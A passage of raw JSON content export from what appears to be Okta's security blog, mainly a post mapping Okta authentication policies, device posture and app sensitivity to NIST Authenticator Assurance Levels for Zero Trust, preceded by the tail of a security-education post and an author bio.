We're committed to using storytelling to create a stronger security culture - one that empowers every team member to live our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"company value\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of Always Secure, Always On.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Learn More\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Security Education team will present at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane/sessions/?tab.allsessionsfilter=1722375948750001fBW3&search=Building%20a%20Robust%20Security%20Education%20Program#/session/1722960641157001RDbO\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Building a Robust Security Education Program\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"” in October. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For more on storytelling, please watch my \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://youtu.be/KJ920WIpHHU\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"keynote\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" address at the CloudNative SecurityCon in July. 
I will also be leading two sessions on Security Education Through the Art of Storytelling at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://conference.ewf-usa.com/event/c76cd0b2-f7f7-4e49-8ca2-dbded0406e07/summary\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"EWF (Executive Women's Forum) Annual Conference\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on October 23, 2024.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"In today's digital world, cybersecurity isn't just a technical issue, it's a human one. "},"updatedAt":"2024-09-05T16:28:27.869Z","secAuthor":[{"id":"a21c5c8e-d13f-5468-9761-0986a3394d27","bio":{"bio":"<p>Ann Wallace is the Director of Product Security Education at Okta. She shares her journey of transforming security education through the art of storytelling. Prior to Okta, Ann held security leadership roles at Google, Nike, and Shopify. She is also on the Board of Directors for WiCyS Oregon. Ann has spoken globally at conferences on Security Education, Women in Tech, and Cloud and Container Security. Ann can also be found trail running around the PNW with her dog Cedar. 
</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2qR594svVD13Nv9d5GRkCe/720d8746d5a87c62f24e4c53c5eff4e8/Screenshot_2024-09-03_at_1.50.39_PM.png"},"name":"Ann Wallace","jobTitle":"Director of Product Security","slug":"/hackers/ann-wallace","node_locale":"en"}]},{"slug":"/articles/2023/03/setting-right-levels-assurance-zero-trust","id":"8a7eab02-4048-5fa1-8bd0-707e6102b03e","title":"Setting the Right Levels of Assurance for Zero Trust","date":"2023-03-31T16:10:06+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine (OIE) is an incredibly powerful platform. What other platform allows you to have this level of security, granularity and control?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Only allow access to a highly sensitive application if the user authenticates with multiple authenticators that are at least one phishing-resistant, and only from a corporate-managed device with a strong EDR posture score.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The more sensitive an application is, the more security context we might seek to verify to ensure the access is legitimate. For organizations with many applications, each with varying levels of sensitivity, it’s traditionally been difficult to create sign-in policies that account for the high assurance sensitive applications require, without over-complicating access to less sensitive resources. 
The scenario we should try to avoid is expecting end-users to re-authenticate using passwords and OTP codes multiple times throughout the day as they navigate the resources they require to do their job.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With Okta Identity Engine, Okta provides shareable authentication policies at the resource-level, and a contextual approach to access. Authentication policies give administrators an ability to define contextual access for each app or for groups of applications. Policy rules can evaluate identity context (group membership), device context (whether a device is known, registered or managed), device posture (the health of the device), network context (the network origin of the request), and patterns of previous user behavior. This provides the required granularity to secure access to applications based on risk.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This flexible framework is key in helping organizations achieve their required \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3-Implementation-Resources/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Levels of Assurance (LOA)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Once the desired LOA threshold is met, those organizations can confidently say that the right users have the right level of access to the right resources at the right time. LOA is a major component of a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/zero-trust/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Zero Trust architecture\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and helps ensure all access is verified, rather than providing implicit trust. 
OIE can be a foundational tool to meet \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.whitehouse.gov/wp-content/uploads/2022/01/M-22-09.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OMB guidance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (.pdf) on moving to Zero Trust security principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Context Considerations for Authentication Policies:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/policies/about-app-sign-on-policies.htm?cshid=ext-about-asop\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication Policies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in Okta Identity Engine verify that users signing in to an application meet specific conditions. The policy engine enforces factor requirements based on those conditions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication Risk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication Risk is a measure of how much a request to Okta deviates from a previously established pattern of behavior for a user. 
Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/oie-risk-behavior-eval.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"risk engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" evaluates a range of contexts including IP history, behavioral information about the user making the sign-in request, previous successful and failed sign-in attempts and routing information associated with the request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Low Risk Auth\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": authentication that does not deviate from the user’s previous behavior (same IP/device/location, etc.)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Medium Risk Auth\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": authentication that deviates slightly from the user’s previous behavior (new city, new device, etc.)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"High Risk Auth\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": authentication that deviates significantly from the user’s previous behavior, or for which no baseline exists yet (impossible travel combined with a new device, a user’s first-ever sign-in, etc.)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NB: Risk-based Authentication requires an org to be licensed for Adaptive Multifactor 
Authentication.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/platform/devices/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (sometimes called Device Context) assesses whether the device used for an authentication request is known, registered, managed or exhibiting a strong security posture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unregistered\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": A device/browser that is not registered with Okta Verify\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/device-assurance.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Registered/Unmanaged\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": A device that is registered with the Okta Verify application to provide administrators with better visibility (OS, Device Type, Serial Number, 
etc.)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/watch?v=UERaxr743gk\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device Assurance\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": Does the device meet certain security requirements? (OS version? Jailbroken? Encrypted? Screen lock configured?)\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Managed\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": A registered device enrolled in a unified endpoint management (UEM) solution. 
This could be with a certificate and a SCEP profile for workstations (Windows/macOS) or an application secret for mobile devices (Android, iOS)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Managed + EDR\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (sometimes called Secured): A managed workstation (Windows/macOS) that is checked for a device \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-available-signals.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"posture score\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" via an EDR solution (CrowdStrike or Windows Security Center)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NB: Device Assurance, Managed Device checks and Device Posture checks all require an org to be licensed for Adaptive Multifactor Authentication.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Risk, Sensitivity and Impact\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The final piece to this puzzle is to determine the sensitivity and impact of the application and its stored data. This exercise is somewhat subjective and may require involvement from risk and compliance teams. 
Some considerations to take into account when classifying apps are: production vs test, regulatory compliance (SOX, PCI-DSS, HIPAA, etc.), and personally identifiable information (PII). We recommend reviewing the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST 800-30\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"(.pdf) or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvlpubs.nist.gov/nistpubs/fips/nist.fips.199.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIPS 199\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"(.pdf) standards for additional guidance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Low Impact App\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Everyday apps that do not contain sensitive data. Examples could be video conferencing, helpdesk, educational applications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Medium Impact App\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Apps that may contain some sensitive information or proprietary information. e.g. 
Communications, collaborations, sales and marketing applications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"High Impact App\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": Apps that provide access to very sensitive or proprietary information. (PII? SOX? Production? Apps with HR, healthcare or financial data?) Anything that would be extremely damaging to the company or customer if access was compromised.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once all of these conditions have been taken into consideration, organizations will be able to apply the right levels of assurance to meet their desired outcome. One way to accomplish this would be to align closely to the NIST \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3-Implementation-Resources/63B/AAL/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authenticator Assurance Levels (AAL)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". While there can be some ambiguity around what specific authenticators meet each of the NIST requirements, we believe it is a great framework to start with. 
In the example below, we have set out our interpretation of how Okta policies and authenticators could align with the NIST AAL framework.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Example Interpretation of NIST’s Authenticator Assurance Levels (AAL)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Authenticator Assurance Level 1 (Low) - Verify using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"one or more factors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Considerations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This could be any factor “something you have (Okta Verify, security key, etc.)”, “something you know (password/secrets)”, or “something you are” (WebAuthn/FIDO2-capable biometric checks like face or fingerprint matching)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set re-authentication settings to 30 days\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This satisfies \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"NIST AAL1\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Authenticator Assurance Level 2 (Medium) - Verify using 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"two distinct factors\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Considerations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This needs to contain two authentication factors, either (1) a physical authenticator and a memorized secret, or (2) a physical authenticator and biometrics linked to that authenticator\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An example would be a password + Okta Verify OTP or password + Okta Verify FastPass with Biometric\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set re-authentication settings to 12 hours and idle session time to 30 minutes\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This satisfies \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"NIST AAL2\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Authenticator Assurance Level 3 (High) - Verify using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"multiple factors, phishing resistance and proof of possession of a hardware-based 
key\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Considerations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of June 2024, Okta FastPass with user verification using biometrics or PIN can be used to satisfy NIST AAL3 requirements \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Other options to satisfy AAL3 include a FIPS device-bound passkey and CAC-PIV Authentication. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set re-authentication settings to 12 hours and idle session time to 15 minutes\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This satisfies \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"NIST AAL3\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NB: Idle Session time is configured at the Global Session Policy level. Session lifetime and idle time apply to first-party Okta apps (i.e., Okta Dashboard, Okta Admin Console, etc.). 
The majority of third party apps require a session lifetime and idle time specified within each respective application.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bringing it all together\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The final step is to configure access policies that balance user convenience and security. With Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/policies/about-app-sign-on-policies.htm?cshid=ext-about-asop\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"sharable application authentication policies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", administrators have the ability to create differentiated access policies for every combination of contextual access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below is a reference table – for illustrative purposes only – that we have used with customers to inform their approach to creating authentication policies in OIE. Much like determining the sensitivity of an app, this exercise is highly subjective and the table should be populated according to your organization’s risk tolerance. 
We've added detailed screenshots of authentication policies and rules in the appendix to further illustrate.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2gTFFt8la9BVCviR1De3Xz\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using the approach taken in this example, a user attempting to access a relatively low sensitivity resource, from a device that has recorded a strong security posture and exhibiting known or trusted patterns of behavior (presenting lower authentication risk), should be subject to less friction to verify their identity. If the application is highly sensitive, the reverse applies - the strongest authenticator factors should be required.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here’s an example of how the table above would play out in a real world situation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scenario 1:\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"John Doe wants to learn a new skill through a course from Udemy that’s offered through his company. (Udemy is classified as low impact by his company)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outcome A - With a corporate-owned device, he’ll be able to access this application from a trusted location without having to enter in his username/password/MFA again. 
This provides a seamless login experience while trusting that the user is who they say they are.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outcome B - With a personal Okta-registered device, John can still access the application as long as he provides two factors of authentication (e.g. password + Okta Verify).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scenario 2:\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Jane Doe needs to access the AWS console to deploy a new application (AWS is classified as high impact by her company)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outcome A - With a corporate-owned device, she'll be able to access it only after she has provided a phishing-resistant authenticator like Okta Verify FastPass or FIDO2/WebAuthn (face or fingerprint matching, physical security key)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outcome B - With a personal Okta-registered device, Jane will be denied access to AWS.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In a perfect world, every access attempt would be challenged with the highest level of authentication assurance. But in reality, that is not always possible. 
For example, some devices and applications do not have the necessary capabilities to support the highest levels of authentication and other authenticators may be required during enrollment or recovery flows.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This is why it is vital to develop Levels of Assurance for your organization, so that each of the different access requirements can be properly addressed. By leveraging Okta Authentication Policies, your organization can take a contextual approach to identity and access management that harmonizes end user experience and security assurance requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Appendix\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Authenticator Assurance Levels are primarily enforced by the Authentication Policies, but the Global session policy is also required to specify Idle Session time. 
Below is an example of a configuration for the Global Session Policy to help address Okta Authenticator Assurance Level 2:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/policies/about-okta-sign-on-policies.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Create a Global Session policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for the everyone group and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/policies/add-okta-sign-on-policy-rule.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"create a new rule\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Keep 